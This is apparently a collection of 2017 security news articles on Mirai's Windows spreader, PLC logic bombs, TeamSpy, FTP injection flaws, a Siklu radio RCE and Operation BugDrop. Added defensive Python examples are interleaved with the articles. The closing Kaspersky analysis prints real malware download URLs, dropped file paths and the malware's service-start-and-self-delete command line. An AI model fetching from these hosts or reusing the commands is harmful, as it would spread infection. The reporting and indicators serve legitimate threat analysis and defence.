Furthermore, the security company says, this exposes more systems and networks to Mirai, while also demonstrating the slow maturing of Mirai. The bot code has been put together from other projects and previous sources, with most components, techniques, and functionality being several years old. The components are hosted embedded in JPEG comments, a technique used since 2013.

Other interesting characteristics of Mirai for Windows include the blind SQL injection (SQLi) and brute forcing techniques, which are compiled from a “Cracker” library charged with the “tasking” of various attacks. Furthermore, the Windows bot’s source was supposedly developed in a modular manner in C++, with its functionality broken out across source libraries. The code signing certificates used by the threat appear to have been stolen from a solar and semiconductor grinding wafer products manufacturer in Northwest China.


Logic Bombs Pose Threat to ICS: Researchers

21.2.2017 securityweek ICS

Ladder logic bombs pose threat to ICS

Logic bombs can pose a significant threat to industrial control systems (ICS), particularly programmable logic controllers (PLCs), researchers warned in a paper published last week.

A logic bomb is a piece of code designed to set off a malicious function when specified conditions are met, such as a time and date, or when data provided by a sensor has a certain value.

It is not unheard of for malware to use logic bombs (e.g. Stuxnet and Shamoon), but experts at IIIT Hyderabad in India and the Singapore University of Technology and Design believe there is not enough research on the threat posed to ICS.

Their research has focused on PLCs and ladder logic programming, which is used to write software for these devices; that is why the experts named this type of threat “ladder logic bombs.”

PLCs are known to have vulnerabilities and researchers have warned of several potential threats, including worms and stealthy pin control attacks.

In an effort to prevent certain attacks, PLC manufacturers have implemented mechanisms designed to block unauthorized firmware from being uploaded to a device. On the other hand, the researchers discovered that there are no authentication or security checks in place to ensure that unauthorized logic updates cannot be delivered to a PLC.

An attacker who has physical access to the targeted PLC – in some configurations attacks can also be conducted over the network – can upload malicious logic to the device and hijack it. The attacker can download and upload logic configurations using specialized software, such as Studio 5000 or ControlLogix from Rockwell Automation.


Researchers believe ladder logic bombs can be very dangerous considering that the attacker needs to access the targeted PLC only once. The “bomb” can then be triggered externally, using a specified input, or it can be triggered internally by a system state, certain instructions or at a preset date and time.

According to experts, ladder logic bombs can be used for a wide range of purposes, including denial-of-service (DoS) attacks, changing the PLC’s behavior, and obtaining data. These attacks have been tested in real-world ICS environments.

In the case of DoS attacks, hackers can add a piece of malicious logic to cause the PLC to stop working, potentially damaging the process it controls. Once triggered, the “bomb” can enter an infinite loop and make the device useless.

Ladder logic bombs can also be leveraged to manipulate data, such as sensor readings, which can be used to cover up other unauthorized activities or cause the device to enter an error state.

Attackers can also secretly log sensitive PLC data by using FIFO buffers and recording data into arrays on the device. Because these threats do not interfere with the device’s normal operation, they can go undetected for an extended period of time.

In order to prevent these types of attacks, researchers have proposed both network-based countermeasures and centralized validation of running code, which includes the use of authentication or cryptographic signatures for logic updates.
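The two countermeasures named above (authenticated logic updates and centralized validation of what is running) can be combined in a single gate in front of the logic download. The following is an added example, not code from the paper or from any PLC vendor. It assumes an engineering-workstation key shared with a gateway that fronts the PLC, uses HMAC-SHA256 as a stand-in for a digital signature, and represents ladder programs as constructed text; the tag is bound to the target PLC identifier so a tag issued for one controller cannot be replayed against another, and a digest of the running program is re-checked against the central allowlist, which is how an added rung (the “bomb”) shows up even if it was loaded through some other path.

```python
import hashlib
import hmac

# Constructed ladder program, one rung per line (a text stand-in for the binary
# logic image a PLC actually stores). The tampered variant appends a rung that
# jumps back on itself once a timer is done: the time-triggered loop pattern.
APPROVED_LOGIC = (b"|--[ I:0/0 ]----( O:0/0 )--|\n"
                  b"|--[ I:0/1 ]----( O:0/1 )--|\n")
TAMPERED_LOGIC = APPROVED_LOGIC + b"|--[ T4:0/DN ]----( JMP 2 )--|\n"


def program_digest(logic: bytes) -> str:
    """Identity of a logic image as recorded on the central allowlist."""
    return hashlib.sha256(logic).hexdigest()


class LogicUpdateGate:
    """Checks performed before a logic download is accepted on behalf of a PLC.

    Two independent controls: the update must carry a valid tag under the
    engineering key (authentication; HMAC stands in for a signature here), and
    its digest must be on the centrally maintained list of validated programs.
    """

    def __init__(self, engineering_key: bytes, approved_digests):
        self._key = engineering_key
        self._approved = set(approved_digests)

    def tag(self, plc_id: str, logic: bytes) -> str:
        # Bind the tag to the target controller so a tag issued for one PLC
        # cannot be replayed against another.
        message = plc_id.encode() + b"\x00" + logic
        return hmac.new(self._key, message, hashlib.sha256).hexdigest()

    def verify(self, plc_id: str, logic: bytes, presented_tag: str):
        """Return (accepted, reason) for a proposed logic update."""
        if not hmac.compare_digest(self.tag(plc_id, logic), presented_tag):
            return False, "authentication tag invalid"
        if program_digest(logic) not in self._approved:
            return False, "program not on central allowlist"
        return True, "accepted"

    def running_program_ok(self, reported_digest: str) -> bool:
        """Periodic attestation: the digest a PLC reports for the program it is
        currently running must still match an approved image."""
        return reported_digest in self._approved


if __name__ == "__main__":
    gate = LogicUpdateGate(b"constructed-engineering-key",
                           [program_digest(APPROVED_LOGIC)])
    good_tag = gate.tag("PLC-01", APPROVED_LOGIC)
    print(gate.verify("PLC-01", APPROVED_LOGIC, good_tag))
    print(gate.verify("PLC-02", APPROVED_LOGIC, good_tag))      # replay to another PLC
    print(gate.verify("PLC-01", TAMPERED_LOGIC, good_tag))      # modified after tagging
    print(gate.running_program_ok(program_digest(TAMPERED_LOGIC)))
```

The allowlist check is what catches a program that was tagged correctly but never passed validation, so the key holder alone cannot push an unreviewed image; in a real deployment the digest would be computed over the exact bytes the controller stores rather than over a text listing.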

Logic bombs were also used recently in the simulation of a ransomware attack on industrial systems. Researchers showed how specially designed malware can hijack and potentially cause serious damage to a water treatment plant.


CompTIA Offers New Security Analyst Certification

21.2.2017 securityweek Security

An ISACA survey released during RSA week sought to illustrate the state of cyber security workforce development and its current trends. The results would surprise no-one in the industry: recruiting security talent is hard.

But the ISACA survey makes two particularly interesting statements: firstly, that 70% of enterprises "require a security certification for open cyber security positions"; and secondly, that for 55% of enterprises, "practical hands-on experience is the most important cyber security candidate qualification." Since a candidate cannot get experience without first getting a position, new candidates for open cyber security jobs need as much help with other 'qualifications' as possible.

Today, CompTIA has announced a new security qualification: CSA+. It sits between Security+ (covering essential principles for network security and risk management), and CASP (the CompTIA Advanced Security Practitioner, which certifies critical thinking and judgment across a broad spectrum of security disciplines).

CSA+ focuses on the skills required for the use of threat detection tools, data analysis and the interpretation of results to identify vulnerabilities, threats and risks. It certifies a proficiency in data driven security.

"By placing greater emphasis on data analytics, we get a real-time, holistic view of the behavior of the network, its users and their devices to identify potential vulnerabilities and strengthen them before an intrusion happens,” explained CompTIA's senior director for products, James Stanger.

This is perhaps the most critical area of the overall cyber security skills gap, and one that is growing faster than most. The Bureau of Labor Statistics states, "Employment of information security analysts is projected to grow 18 percent from 2014 to 2024, much faster than the average for all occupations. Demand for information security analysts is expected to be very high, as these analysts will be needed to create innovative solutions to prevent hackers from stealing critical information or causing problems for computer networks."

"Data analytics is key," says Jim Lucari, senior manager of certification at HP Enterprise. "Everybody in technology should have this CSA+. It should be mandatory if you're going to stay in IT over the coming decade." The CSA+ qualification could help potential employers gauge candidates' aptitude and skill level for this critical area.

CSA+ exams are available globally via Pearson VUE Testing centers. However, it is not an entry-level security qualification. Although private individuals could use it as part of a project to get into cyber security, it might better suit career advancement than career entry. "Because of the advanced nature of CompTIA CSA+," Stanger told SecurityWeek, "we recommend that candidates for the certification have a minimum of three to four years of hands-on information security or related experience; and hold CompTIA Network+ and Security+ certifications."

One of the recommendations from the ISACA survey suggests that employers should "Groom employees with tangential skills -- such as application specialists and network specialists -- to move into cyber security positions."

Putting such staff through the CSA+ certification could provide a cost-effective approach to filling the cyber security analyst gap. "We recommend a minimum of five days of intensive 'boot camp' style training," said Stanger; "or a quarter or semester of academic instruction."


TeamSpy Malware Spotted in New Campaign

21.2.2017 securityweek Virus

TeamSpy, the data-stealing malware that was associated with a decade-long cyber-espionage operation several years ago, has resurfaced in a new attack campaign, Heimdal Security researchers warn.

The malware, designed to provide its operators with full access to the compromised machines, was used in an information gathering operation that focused mainly on ordinary people, though some victims were found to be high profile industrial, research, or diplomatic targets. The malware was abusing the legitimate TeamViewer remote access tool for its nefarious operations, researchers discovered.

The newly observed attack relies on social engineering to trick potential victims into installing TeamSpy onto their computers. The malware is being distributed via spam emails that contain a malicious ZIP attachment designed to drop an infected DLL (MSIMG32.dll) on the target machine. Two other files are also downloaded onto the computer: 324.bat and 324.exe.

Like other TeamViewer-abusing malware, the malicious app leverages DLL hijacking to abuse the legitimate software for its nefarious operations. TeamSpy includes various components of the legitimate program, such as a TeamViewer VPN and a keylogger. Upon installation, it kills a series of Windows processes to install these components and launch them.

Simultaneously, the malware copies logs to a text file and writes all usernames and passwords it can find to it. The file is then sent to the command and control (C&C) server.

The final goal of the attack, however, is to gain complete control of the infected PC and to gather confidential information from it while keeping a low profile to avoid alerting the user. For that, the malware downloads additional components, including the TeamViewer application.

“Given how the TeamSpy infection happens, it is clear that a TeamViewer session started by the attackers will be invisible to the victim. This can lead to numerous forms of abuse against the services that the logged in user runs on his/her computer,” Heimdal Security’s Andra Zaharia notes. What’s more, the attack can circumvent two-factor authentication, she says.

The newly observed payload has a low detection rate at the moment and users are advised to carefully analyze all unwanted emails and to avoid downloading attachments from unknown senders. “Malware can disguise itself in many forms on the web, and all it takes is one click to trigger an infection,” Zaharia concludes.
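The DLL hijacking described above works because Windows resolves a DLL name against the application’s own directory before the system directory, so a lookalike placed next to the executable is what gets loaded. A host check for that placement, added here as an example (not Heimdal Security’s code or any product’s): it lists DLLs in an application folder whose names collide with system DLLs, hashes them for later lookup, and separately reports the loose files the article names as dropped (324.bat, 324.exe). The set of system DLL names is a constructed subset, and the sample folder is built in a temporary directory with placeholder contents so the check runs offline.

```python
import hashlib
import tempfile
from pathlib import Path

# System DLLs that an application should only load from the Windows system
# directory. Constructed subset for this example; MSIMG32.dll is the name the
# TeamSpy dropper used.
SYSTEM_DLL_NAMES = {"msimg32.dll", "version.dll", "dwmapi.dll", "cryptbase.dll"}

# Loose files the article reports as dropped alongside the DLL.
DROPPER_ARTIFACTS = {"324.bat", "324.exe"}


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def find_hijack_candidates(app_dir, system_dll_names=SYSTEM_DLL_NAMES):
    """List (filename, sha256) for DLLs in app_dir that shadow a system DLL.

    Folders without an executable are skipped: with nothing to launch there,
    a shadowing DLL in them is not on any search path and is not a hijack.
    """
    app_dir = Path(app_dir)
    entries = [p for p in app_dir.iterdir() if p.is_file()]
    if not any(p.suffix.lower() == ".exe" for p in entries):
        return []
    return [(p.name, sha256_of(p)) for p in sorted(entries)
            if p.suffix.lower() == ".dll" and p.name.lower() in system_dll_names]


def find_dropper_artifacts(app_dir, names=DROPPER_ARTIFACTS):
    """Filenames in app_dir matching the dropper's known loose file names."""
    return sorted(p.name for p in Path(app_dir).iterdir()
                  if p.is_file() and p.name.lower() in names)


def build_sample_dir() -> Path:
    """Constructed fixture: an application folder holding an EXE, a lookalike
    system DLL, one legitimate private DLL and one dropper artifact. Contents
    are placeholders, not real PE files."""
    d = Path(tempfile.mkdtemp(prefix="dllcheck_"))
    (d / "TeamViewer.exe").write_bytes(b"MZ placeholder exe")
    (d / "MSIMG32.dll").write_bytes(b"MZ placeholder dll")
    (d / "app_helper.dll").write_bytes(b"MZ placeholder private dll")
    (d / "324.bat").write_bytes(b"rem placeholder")
    return d


if __name__ == "__main__":
    folder = build_sample_dir()
    for name, digest in find_hijack_candidates(folder):
        print(f"shadowing DLL: {name} sha256={digest}")
    print("dropper artifacts:", find_dropper_artifacts(folder))
```

A name collision alone is a lead, not a verdict: the hash is there so the file can be compared against the vendor’s known-good binaries before anyone decides it is the planted copy.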


Corporate email addresses are 6.2x more targeted by phishing
21.2.2017 securityaffairs Phishing

At the RSA security conference in San Francisco, the experts at Google Research explained that Corporate email addresses are privileged targets for hackers.
At the RSA security conference in San Francisco, the Google Research team shared the results of an interesting study on cyber attacks against email accounts.

Corporate email addresses are 4.3 times more likely to receive malicious code than personal accounts, 6.2 times more likely to receive phishing lures, and 0.4 times less likely to receive spam messages.


Analyzing more than one billion emails that passed through its Gmail service, the Google Research team found that corporate inboxes are a privileged target for threat actors. The result is not surprising, because corporate email accounts contain information that is more valuable to attackers: cyber criminals can steal it and resell it on the Dark Web, while nation-state actors could use it for espionage activities.

Which is the most targeted industry?

The result is interesting: organizations in the real estate sector were the most targeted with malicious code, while spam emails proposing products and services mostly targeted companies in the entertainment and IT industries.


Organizations in the financial sector are the privileged target of phishing campaigns, the experts at Google believe that phishing attacks will continue to increase in the future.

There is also good news for Gmail users: as announced by Elie Bursztein, the head of Google’s anti-abuse research team, the company is going to implement SMTP Strict Transport Security (SMTP STS) for the email service.

SMTP STS will provide a further security measure to protect Gmail users from man-in-the-middle attacks that leverage rogue certificates.

“Google, Microsoft, Yahoo and Comcast are expected to adopt the standard this year, a draft of which was submitted to the IETF in March 2016.” wrote ThreatPost.


Unpatched Flaws in Python, Java Allow Firewall Bypass

21.2.2017 securityweek Vulnerability

Unpatched vulnerabilities related to how Java and Python handle file transfer protocol (FTP) URLs can be exploited for various purposes, including for sending unauthorized emails and bypassing firewalls, researchers warned.

In a blog post published over the weekend, Alexander Klink showed how XML external entity (XXE) and server-side request forgery (SSRF) vulnerabilities can be exploited to send emails via SMTP (Simple Mail Transfer Protocol) commands using specially crafted FTP URLs.

Klink’s attack method relies on Java XML parsers and the expert believes it can be particularly useful for scenarios where the attacker has access to an internal mail server from the system that does the XML parsing. The researcher showed how a specially crafted FTP URL can be used to send emails, including ones with attachments.

However, according to Blindspot Security’s Timothy Morgan, the attack method can be used for more than just sending emails. Furthermore, in addition to Java’s FTP URL handling code, a similar vulnerability affects Python’s urllib and urllib2 libraries.

After seeing Klink’s blog post, Morgan also published an advisory describing his findings. He pointed out that such FTP injections can be used to trick a firewall into accepting TCP connections from the Web to the vulnerable system on a specified port.

When a classic mode FTP connection is initiated, the firewall needs to temporarily open a port – typically between 1024 and 65535 – specified in the PORT command. This has been known to introduce security risks for well over a decade, but many firewall vendors still support classic mode FTP by default.

Using the vulnerability, an attacker who knows the targeted host’s internal IP address can inject a malicious PORT command into the stream and open an arbitrary port. The challenge is to determine the victim’s IP address and ensure that the PORT command is sent at the beginning of a packet.

Morgan has determined that an attacker can open up one port in the targeted firewall with only three requests: one to identify the victim’s internal IP, one to determine packet alignment and ensure that the PORT command is injected at the right moment, and one to actually exploit the vulnerability. Each additional request can be used to open up another TCP port.

There are several methods that can be used to exploit the flaw, including via man-in-the-middle (MitM), SSRF and XXE attacks. The most “startling” attack scenario, according to Morgan, involves JNLP (Java Network Launch Protocol) files.

“If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP file. These files could contain malicious FTP URLs which trigger this bug,” Morgan explained. “Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be fully successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).”

Python developers were notified about the issue more than one year ago, and Oracle was provided the details of the attack method in November. However, the issue still hasn’t been addressed in either Java or Python.

Morgan has developed a proof-of-concept (PoC) exploit, but it will only be made public after Oracle and Python release patches.

The method has been tested against Palo Alto Networks and Cisco ASA firewalls, but experts believe many commercial firewalls are vulnerable to FTP stream injection attacks.

Until patches become available, attacks can be prevented by uninstalling Java and by disabling classic mode FTP in firewalls.
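Two defensive checks follow from the mechanism described above (a crafted FTP URL whose components end up on the control channel, and a firewall that honours whatever address a PORT command advertises). They are an added example, not code from Morgan’s advisory or from any firewall vendor. The first gates an FTP URL before it reaches a URL-fetching library by rejecting control characters (CR, LF, NUL) in any raw or percent-decoded component, which is the application-side mitigation while the libraries remain unpatched. The second is the strict application-layer-gateway rule a firewall should apply to active-mode FTP: open a data pinhole only if the PORT command names the connecting client’s own address and an unprivileged port in the 1024–65535 range the article mentions. The session transcript used at the end is constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# Any control character (CR, LF, NUL, ...) inside an FTP URL component could be
# written onto the FTP control channel as a command boundary by a naive client.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def ftp_url_is_safe(url: str) -> bool:
    """Gate an FTP URL before handing it to a URL-fetching library.

    Rejects anything that is not an ftp:// URL with a host, or whose raw text or
    percent-decoded user, password, path or query contains control characters.
    """
    if _CONTROL.search(url):
        return False
    parts = urlsplit(url)
    if parts.scheme != "ftp" or not parts.hostname:
        return False
    for component in (parts.username or "", parts.password or "",
                      parts.path, parts.query):
        if _CONTROL.search(unquote(component)):
            return False
    return True


def port_command_consistent(client_ip: str, port_arg: str) -> bool:
    """Strict-ALG rule for an active-mode PORT argument (h1,h2,h3,h4,p1,p2).

    The advertised address must equal the connecting client's own address and
    the port must be unprivileged (1024-65535); otherwise no pinhole is opened.
    """
    fields = port_arg.strip().split(",")
    if len(fields) != 6 or not all(f.isdigit() for f in fields):
        return False
    nums = [int(f) for f in fields]
    if any(n > 255 for n in nums):
        return False
    advertised = ipaddress.ip_address(".".join(str(n) for n in nums[:4]))
    port = nums[4] * 256 + nums[5]
    return advertised == ipaddress.ip_address(client_ip) and 1024 <= port <= 65535


def audit_ftp_session(client_ip: str, commands):
    """Return the 1-based positions of PORT commands in a control-channel
    transcript that a strict ALG would refuse to honour."""
    flagged = []
    for index, line in enumerate(commands, start=1):
        verb, _, arg = line.strip().partition(" ")
        if verb.upper() == "PORT" and not port_command_consistent(client_ip, arg):
            flagged.append(index)
    return flagged


if __name__ == "__main__":
    print(ftp_url_is_safe("ftp://user@example.test/pub/file.txt"))
    print(ftp_url_is_safe("ftp://user%0D%0AQUIT@example.test/file.txt"))
    # Constructed transcript: the second PORT names an address other than the client's.
    session = ["USER anonymous", "PORT 10,0,0,5,4,1", "PASV", "PORT 10,0,0,9,0,22"]
    print(audit_ftp_session("10.0.0.5", session))
```

Note that urllib’s own parser silently drops some raw newline characters, which is why the raw-string check runs before parsing and the decoded components are checked separately; a control character that survives either step is reason enough to refuse the URL.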


Siklu fixed a serious RCE vulnerability in the Siklu EtherHaul Radios
21.2.2017 securityaffairs Vulnerability

The security researcher Ian Ling discovered a serious remote command execution (RCE) flaw in the Siklu EtherHaul Radios devices.
Security expert Ian Ling has discovered a severe remote command execution (RCE) vulnerability in the Siklu’s EtherHaul wireless point-to-point radios.

The flaw could be exploited by remote unauthenticated attackers to execute commands and retrieve sensitive information, including usernames and plaintext passwords from the device.

The Israeli firm Siklu has already released a patch to address the vulnerability in the vast majority of its products that have been sold to mobile operators, service providers, wireless security network operators, governments, and enterprises.

The security expert discovered the flaw while testing a feature in the web interface that could be used by operators to configure one radio from another that has a wireless connection to it.

“Siklu EtherHaul devices (wireless point-to-point radios) have a feature in the web interface that allows you to configure both radios in a pair from either side.” reads the post published by the expert.


Ling noticed that the EtherHaul radios have three open ports: 22 and 443 for management purposes, and 555, whose use was not clear.

Further analysis of port 555 allowed the researcher to discover that the service it exposes requires only a username for authentication. This means that a remote attacker can send specially crafted requests that appear to come from another Siklu EtherHaul device in order to execute arbitrary commands on the radio.

“Using another vulnerability I found on the EtherHauls, I was able to log in as root and access a Linux shell. The EtherHauls have a tcpdump binary on them, which allowed me to record a packet capture of all traffic involving port 555 and see exactly what data was being sent between the devices.” continues the analysis.

“Prior to the “mo-info rf” command being sent, the device making the request first “authenticates” by sending the username of whoever is logged in, surrounded by a lot of null bytes:”

The researcher discovered that using specific commands it was possible to retrieve login credentials of the EtherHauls and set a new administrator password.

Ling has published the following proof-of-concept (PoC) code exploits:

Show username and password in plaintext: https://gist.github.com/ianling/c06636fba1b294393f0d3b7df082aa91
Set password to “Abc123123”: https://gist.github.com/ianling/6f4b8c76aa369618e3ae7dd494958762
The vulnerability was reported to Siklu on December 22 and the company issued security updates on February 13.

Last year, Ling had spotted another serious vulnerability in the Siklu EtherHaul radios: a hidden root account that had the same unchangeable password on all devices.


Severe Vulnerability Patched in Siklu Radios

21.2.2017 securityweek Vulnerability

Researcher Ian Ling has discovered a serious remote command execution (RCE) vulnerability in Siklu’s EtherHaul wireless point-to-point radios. Updates that patch the flaw have been released for a majority of the affected products.

Siklu is a Tel-Aviv, Israel-based company that specializes in millimeter wave wireless connectivity radios. The firm says it has a 30% market share and it has sold thousands of radios worldwide to mobile operators, service providers, wireless security network operators, governments and enterprises.

Ling discovered the vulnerability while analyzing a feature in the web interface that allows users to configure one radio from another that has a wireless connection to it. An analysis showed that EtherHaul radios have three ports open, including TCP port 555, which devices connect to during this process.

An analysis of the traffic on port 555 led the researcher to discover that the service running on this port requires only a username for authentication. This allows an attacker to send specially crafted requests that appear to come from another EtherHaul device and execute arbitrary commands on the radio.

One of the commands can be used to retrieve the device’s username and password in plain text. Another command can be leveraged to set a new administrator password. Ling has published proof-of-concept (PoC) code for both these exploits.

According to the expert, the service running on port 555 can be accessed by anyone over the Internet as it is not protected by a firewall or an access control list (ACL).

The vulnerability was reported to Siklu on December 22 and patches were released on February 13. Updates have been made available for all EtherHaul radios, except for models that have reached end of life.

This is not the first time Ling has identified a serious vulnerability in Siklu EtherHaul radios. Roughly one year ago, he reported finding a hidden root account that had the same unchangeable password on all devices. The account, accessible via the device’s interface and SSH, granted access to the underlying Linux operating system, giving an attacker full control.


Operation BugDrop – Hackers siphoned 600GB taking control of PC microphones
21.2.2017 securityaffairs Cyber

Security firm CyberX uncovered the Operation Bugdrop, a cyber espionage campaign that mostly targeted Ukrainian organizations.
Researchers at Security firm CyberX have discovered a cyber espionage campaign that siphoned more than 600 gigabytes from about 70 targets in several industries, including critical infrastructure and news media.

The list of targets includes:

A company that designs remote monitoring systems for oil and gas pipelines
An international organization that monitors human rights, counter-terrorism, and computer attacks on Ukrainian critical infrastructure
An engineering company that designs electrical substations, gas distribution pipelines, and water supply plants
A scientific research institute
Editors of Ukrainian newspapers
The experts have dubbed this espionage campaign Operation BugDrop because attackers use the PC microphones to bug targets and capture the audio and other sensitive data.

The threat actors used sophisticated malware to exfiltrate sensitive data and capture screenshots. The attack chain starts with phishing emails carrying malicious Microsoft Word documents; once the target machine is infected, the malware uploads the stolen audio and data to Dropbox.

To make the phishing email more effective, the Word document included a graphic that looked like an official Microsoft notification and displayed the following message:

“Attention! The file was created in a newer version of Microsoft Office programs. You must enable macros to correctly display the contents of a document.”


“Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources. In particular, the operation requires a massive back-end infrastructure to store, decrypt and analyze several GB per day of unstructured data that is being captured from its targets.” reads the analysis published by CyberX “A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics.”

The vast majority of the targets are located in Ukraine, other countries affected included Saudi Arabia and Austria.

The researchers haven’t found any evidence that links the Operation BugDrop to the string of attacks against the Ukrainian infrastructure that caused the massive power outage in the country.

The attackers behind the BlackEnergy threat also targeted a broad range of industries in Ukraine leveraging on spear-phishing messages with weaponized Microsoft Word documents.

The experts at CyberX also found similarities between the Operation BugDrop and the cyber espionage campaign tracked as Operation Groundbait that was discovered in May 2016.

“Initially, CyberX saw similarities between Operation BugDrop and a previous cyber-surveillance operation discovered by ESET in May 2016 called Operation Groundbait. However, despite some similarities in the Tactics, Techniques, and Procedures (TTPs) used by the hackers in both operations, Operation BugDrop’s TTPs are significantly more sophisticated than those used in the earlier operation.” reads the analysis, which also includes the following examples.

Dropbox for data exfiltration, a clever approach because Dropbox traffic is typically not blocked or monitored by corporate firewalls.
Reflective DLL Injection, an advanced technique for injecting malware that was also used by BlackEnergy in the Ukrainian grid attacks and by Duqu in the Stuxnet attacks on Iranian nuclear facilities. Reflective DLL Injection loads malicious code without calling the normal Windows API calls, thereby bypassing security verification of the code before it gets loaded into memory.
Encrypted DLLs, thereby avoiding detection by common anti-virus and sandboxing systems because they’re unable to analyze encrypted files.
Using legitimate free web hosting sites for command-and-control infrastructure. C&C servers are a potential pitfall for attackers as investigators can often identify attackers using registration details for the C&C server obtained via freely-available tools such as whois and PassiveTotal. Free web hosting sites, on the other hand, require little or no registration information. Operation BugDrop uses a free web hosting site to store the core malware module that gets downloaded to infected victims. In comparison, the Groundbait attackers registered and paid for their own malicious domains and IP addresses.
The CyberX researchers speculate that a nation-state actor is behind Operation BugDrop.

“Skilled hackers with substantial financial resources carried out Operation BugDrop,” reads the analysis. “Given the amount of data analysis that needed to be done on [a] daily basis, we believe BugDrop was heavily staffed. Given the sophistication of the code and how well the operation was executed, we have concluded that those carrying it out have previous field experience.”


New(ish) Mirai Spreader Poses New Risks
21.2.2017 Kaspersky BotNet

A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly. However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.

The earliest we observed this spreader variant pushing Mirai downloaders was January 2016. This Windows bot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t have a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a new threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they can be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center software, and other internal devices.

So, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very limited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web resources and servers. These servers help provide a better timeline of operation for the operator. One of the directly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And most of the bot’s functionality clearly traces back to public sources at least as early as 2013. It’s not the freshest code or most impressive leap.

Regardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows platform. Much like the Zeus banking trojan source code release that brought years of problems for the online community, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure for years to come, and this is just a minor start.

Notably, the 2016 Mirai operations were unique for two reasons:

newly practical exploitation and misuse of IoT devices (mainly DVR, CCTV cameras, and home routers) on a large scale
record setting DDoS traffic generation, exceeding all previous volumes
The great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation states’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of nation states. Time will only tell if nation states choose to hide their destructive activity in plain sight in the Internet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down wide swaths of the internet using this juvenile toolset? It’s very possible.

In response to the huge problem this poses to the internet infrastructure, over the past few months, our team and CERT have participated in multiple successful command and control takedown efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these takedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And, we are happy to partner with more network operators to leverage our connections with CERTs, LE, and other partners around the world to further enable this success.

The Windows Spreader – Who What Where

This Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading techniques, including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot executables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and checks in to a hardcoded list of c2 for hosts to scan and attack. Upon successful intrusion, it can spread the Linux Mirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a downloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot. These devices include

IP-based cameras
DVR
Media center appliances
Various Raspberry and Banana Pi
Unfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly one that is not juvenile like the original Mirai operator set. Based on multiple artefacts, the word choice from string artefacts, the code having been compiled on a Chinese system, that the host servers are maintained in Taiwan, abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics, it is likely that this developer/operator is Chinese speaking.

The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and network for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source is publicly available.

Below is a proportional comparison of the second stage component’s IP geolocations (fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is served from one of two web hosts, both hosted in Taiwan:

http://down.mykings[.]pw:8888/ups.rar

http://up.mykings[.]pw:8888/ups.rar

When downloaded, it is copied to disk with one of several filenames and executed:

cab.exe, ms.exe, cftmon.exe

Clearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.


Components

The bot code and various components have been pulled together from other projects and previous sources. At runtime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading additional configuration files, fetching further instruction, and downloading and running additional executable code. Again, mostly all of these components, techniques, and functionality are several years old and are very large file objects.

Windows Spreader Infection Process
i.e. c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)
Changes DNS settings to 114.114.114.114, 8.8.8.8.
Downloads and executes from hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)
hxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)

Downloads

hxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg (b27590a4b89d31dc0210c3158b82c175) to c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)

and runs with command line parameters “-create” “-run”

Downloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)

This file is a command shell script that registers a variety of files, including database connectivity libraries, and cleans up unneeded traces of itself on the system.

http://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)

It copies itself to the tasks directory, and installs itself as a scheduled job.
c:\windows\system\my1.bat
c:\windows\tasks\my1.job
c:\windows\system\upslist.txt
c:\windows\system32\cmd.exe /c sc start xWinWpdSrv&ping 127.0.0.1 -n 6 && del c:\windows\system\msinfo.exe >> NUL
c:\program files\kugou2010\ms.exe (10164584800228de0003a37be3a61c4d)

Keylogger (hosted as comments within jpeg files)

